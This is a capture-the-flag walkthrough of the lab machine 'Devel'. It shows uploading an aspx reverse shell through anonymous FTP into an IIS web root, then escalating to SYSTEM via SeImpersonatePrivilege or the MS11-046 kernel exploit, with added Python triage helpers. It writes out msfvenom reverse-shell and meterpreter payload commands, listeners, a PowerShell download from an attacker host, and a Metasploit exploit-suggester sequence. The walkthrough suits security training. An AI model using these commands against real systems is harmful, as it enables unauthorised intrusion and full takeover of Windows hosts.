Devel

One-line summary (without msf) :-: ftp (anonymous login) --> put aspx reverse shell --> execute it through IIS --> gain access --> whoami /priv --> SeImpersonatePrivilege enabled --> PrintSpoofer --> rooted

One-line summary (with msf) :-: ftp (anonymous login) --> put aspx meterpreter reverse shell --> execute it through IIS --> gain access (meterpreter) --> msf local exploit suggester --> try the suggested exploits --> rooted

Port Scanning

I have a habit of running scans in phases and saving them in sequence, like scan1, scan2.

The first scan was a full port scan, saved as nmap/scan1:

nmap -p- -n -vvv -oN nmap/scan1 10.10.10.5

The second scan targeted the open ports with default scripts and version detection, saved as nmap/scan2:

sudo nmap -p80,21 -sCV -oN nmap/scan2 10.10.10.5


Port 80: Microsoft IIS httpd 7.5

Port 21: FTP, anonymous login allowed

ftp 10.10.10.5

Successfully logged in with anonymous login (user anonymous, any password).

Upload a test file over FTP and request it through the browser to confirm what the FTP root is.

The FTP root is the IIS web root, so anything anonymous uploads is served over HTTP. That is the whole foothold: an uploaded aspx page is executed by IIS.
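A scripted version of that check, as an added example that is not part of the original writeup: it uploads a random marker over anonymous FTP, fetches it over HTTP and compares the bytes, then deletes the marker so nothing is left behind. The target 10.10.10.5 comes from the page; the function names and the fake transport used for offline testing are my own.

```python
"""Confirm that the anonymous FTP root and the IIS web root are the same directory.

Added example, not from the original writeup. The target host is the one on the
page; the helper names and the fake transport are assumptions for offline use.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request

HOST = "10.10.10.5"


def marker_name() -> str:
    """Random name so the probe cannot collide with or overwrite real content."""
    return f"probe_{secrets.token_hex(4)}.txt"


def check_webroot_overlap(put, get, delete=None) -> bool:
    """put(name, bytes) uploads via FTP, get(name) returns the HTTP body (or None
    on 404). True only if the exact uploaded bytes come back over HTTP."""
    name = marker_name()
    payload = secrets.token_hex(16).encode()
    put(name, payload)
    try:
        return get(name) == payload
    finally:
        if delete is not None:
            delete(name)          # clean up even if the HTTP fetch failed


def ftp_http_transport(host: str = HOST, ftp_port: int = 21):
    """Real transport: anonymous FTP for put/delete, plain HTTP GET for the fetch."""
    ftp = ftplib.FTP()
    ftp.connect(host, ftp_port, timeout=10)
    ftp.login()                   # anonymous login

    def put(name, data):
        ftp.storbinary(f"STOR {name}", io.BytesIO(data))

    def get(name):
        try:
            with urllib.request.urlopen(f"http://{host}/{name}", timeout=10) as resp:
                return resp.read()
        except urllib.error.HTTPError:
            return None

    def delete(name):
        ftp.delete(name)

    return put, get, delete


def fake_transport(shared_root: bool):
    """Offline stand-in (constructed): an FTP directory that either is or is not
    the directory the web server serves from."""
    ftp_dir, web_dir = {}, {}
    if shared_root:
        web_dir = ftp_dir         # same directory object: FTP root == web root

    def put(name, data):
        ftp_dir[name] = data

    def get(name):
        return web_dir.get(name)

    def delete(name):
        ftp_dir.pop(name, None)

    return put, get, delete


if __name__ == "__main__":
    put, get, delete = ftp_http_transport()
    print("FTP root == web root:", check_webroot_overlap(put, get, delete))
```

A random marker name and random body matter: checking with a fixed name like test.txt can return a stale file from an earlier attempt, and a 200 with the wrong body would be a false positive.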

A quick search on the IIS version: IIS 7.5 ships with Windows Server 2008 R2 and Windows 7.

A little about asp vs aspx

asp (classic ASP) pages are VBScript based.

aspx pages are ASP.NET (.NET) based.

On an old IIS 6 / Windows Server 2003 box I would reach for a classic ASP payload, since ASP.NET is only there if the framework was installed. IIS 7.5 on 2008 R2 / Windows 7 is relatively recent and .NET based, so I'll go with aspx.

Gaining Access

Create the payload (stageless reverse shell, 32-bit, which also runs on a 64-bit host):

msfvenom -p windows/shell_reverse_tcp LHOST=<your ip> LPORT=4444 -f aspx -o rks.aspx

Log in to ftp and upload the payload with the put command:

put rks.aspx

Start the listener first, then execute the shell from the browser by requesting http://10.10.10.5/rks.aspx

The shell comes back to the listener:

nc -nvlp 4444

Windows Priv Esc (without MSF) Method 1 [SeImpersonatePrivilege]

whoami /priv

You can see that SeImpersonatePrivilege is Enabled.

This privilege lets the process impersonate any token it can get a handle to. Service identities such as the IIS application pool account hold it by default, so a local attacker who can coerce a SYSTEM process into authenticating to a pipe they control gets a SYSTEM token.

I will use PrintSpoofer to exploit this and escalate to NT AUTHORITY\SYSTEM. If PrintSpoofer does not run on this older build, the Potato family (JuicyPotato covers Windows 7 / 2008 R2) abuses the same privilege.

Windows Priv Esc (without MSF) Method 2 [Kernel Exploit]

whoami

iis apppool\web

systeminfo

gives you the Windows system information needed for priv esc and local enumeration.

Info to look for: hotfixes, architecture, and OS version/build.
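Both priv-esc routes on this page start from reading two command outputs: `whoami /priv` (Method 1) and `systeminfo` (Method 2). The triage below is an added example, not the writeup's own code: it parses constructed samples of both outputs (shaped like this box: Windows 7 build 7600, x86, no hotfixes, IIS app pool identity) and reports the leads a practitioner would act on. Function names are my own.

```python
"""Triage `whoami /priv` and `systeminfo` output for token impersonation and
unpatched-kernel leads. Added example; sample outputs below are constructed."""
import re

WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
"""

# Constructed counter-example: patched x64 host, with a non-hotfix [01] entry
# to show that only the Hotfix(s) section is collected.
SYSTEMINFO_PATCHED = """\
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Privileges the Potato family / PrintSpoofer turn into SYSTEM.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def enabled_privileges(text: str) -> set:
    """Names of privileges whose State column reads Enabled."""
    enabled = set()
    for line in text.splitlines():
        parts = line.split()
        if (len(parts) >= 2 and parts[0].startswith("Se")
                and parts[0].endswith("Privilege") and parts[-1] == "Enabled"):
            enabled.add(parts[0])
    return enabled


def parse_systeminfo(text: str) -> dict:
    """OS name, build number, architecture and installed KBs from systeminfo."""
    info = {"os_name": None, "build": None, "arch": None, "hotfixes": []}
    section = None                          # which multi-line list we are inside
    for line in text.splitlines():
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if re.fullmatch(r"\[\d+\]", key):   # continuation line such as "[01]: KB..."
            if section == "hotfix" and value.startswith("KB"):
                info["hotfixes"].append(value)
            continue
        section = "hotfix" if key == "Hotfix(s)" else None
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            m = re.search(r"Build (\d+)", value)
            info["build"] = int(m.group(1)) if m else None
        elif key == "System Type":
            info["arch"] = "x64" if value.lower().startswith("x64") else "x86"
    return info


def triage(priv_text: str, sysinfo_text: str) -> list:
    """Priv-esc leads, most direct first."""
    leads = []
    for p in sorted(enabled_privileges(priv_text) & IMPERSONATION_PRIVS):
        leads.append(f"{p} enabled: token impersonation (PrintSpoofer / Potato family)")
    info = parse_systeminfo(sysinfo_text)
    if info["build"] and not info["hotfixes"]:
        leads.append(f"no hotfixes on build {info['build']} {info['arch']}: "
                     f"search kernel exploits for exactly this build and architecture")
    return leads
```

The architecture and exact build are what you feed into the exploit search (and into the compiler flags later); the hotfix list is what tells you whether a given MS bulletin is already patched.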

searchsploit -u // to update the searchsploit database

Google "windows 7 7600 32 bit exploit" or "windows 7 x86 privilege escalation exploit".

Found MS11-046 for priv esc. I copied the EDB ID and pulled the exploit with searchsploit:

searchsploit -m 40564

Cross Compiling Exploit

If you don’t have mingw-w64 installed, install it.

apt-get install mingw-w64

To cross-compile the exploit for a 32-bit target, use the command below (the i686 prefix selects the 32-bit toolchain; -lws2_32 links Winsock, which this exploit needs):

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

File Sharing Kali to Windows using PowerShell

On the attacker machine start an HTTP server (python -m SimpleHTTPServer 80, or python3 -m http.server 80), then download the exe with PowerShell:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:80/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Run the exploit: 40564.exe

Check the user: whoami --> nt authority\system

rooted

Windows Priv Esc (with MSF)

Generate meterpreter payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your ip> LPORT=<your listening port> -f aspx -o rks.aspx

I am being careful with the payload selection: a 64-bit payload is not going to work if the target is 32-bit. 32-bit is the safest initial choice because a 32-bit payload also runs on a 64-bit machine.
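The same architecture rule applies to the cross-compiled 40564.exe from Method 2 and to any msfvenom -f exe payload, and it is cheap to verify before the file goes over. The check below is an added example, not code from the writeup: it reads the Machine field of the PE COFF header. It does not apply to the .aspx payload, which is source text; there the architecture is fixed by the payload name (windows/... is x86, windows/x64/... is x64). The fake header builder is constructed so the check can run offline; function names are my own.

```python
"""Report the architecture of a Windows PE before pushing it to the target.

Added example, not from the original writeup. fake_pe() builds constructed
minimal headers for offline testing; real use is `python pecheck.py 40564.exe`.
"""
import struct
import sys

# IMAGE_FILE_MACHINE_* values from the PE/COFF specification.
MACHINE = {0x014C: "x86", 0x8664: "x64", 0x01C0: "arm", 0xAA64: "arm64"}


def pe_machine(data: bytes) -> str:
    """Architecture name of a PE image; raises ValueError if it is not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ header)")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)   # offset of "PE\0\0"
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file (missing PE signature)")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)  # COFF Machine field
    return MACHINE.get(machine, f"unknown(0x{machine:04x})")


def matches_target(data: bytes, target_arch: str) -> bool:
    """True when the binary can run on a host of target_arch (x86 runs on x64 too)."""
    arch = pe_machine(data)
    return arch == target_arch or (arch == "x86" and target_arch == "x64")


def fake_pe(machine: int) -> bytes:
    """Constructed minimal DOS + PE headers, only for exercising the check offline."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)   # e_lfanew: PE header right after DOS header
    coff = b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18
    return bytes(dos) + coff


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        print(pe_machine(f.read()))
```

For the mingw build on this page the expected answer is x86; if it reports x64 the wrong compiler prefix (x86_64-w64-mingw32-gcc) was used.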

Setup listener for meterpreter

msfconsole

use exploit/multi/handler

show options

set payload windows/meterpreter/reverse_tcp

set lhost tun0

set lport <your listening port>

run

Execute the shell from the browser and get a meterpreter session back.

sysinfo

Check that the architecture matches the payload you used; if not, change your payload to the target architecture and redo the steps above.

background (or Ctrl+Z) to background the session

search suggester   (looking for the local exploit suggester)

use post/multi/recon/local_exploit_suggester

sessions -l

set session 1

run

It checks a bunch of potential exploits against this machine and gives you a list of the ones that look applicable.

Select one and load it:

use exploit/....

show options

set session 1

set lhost tun0

run
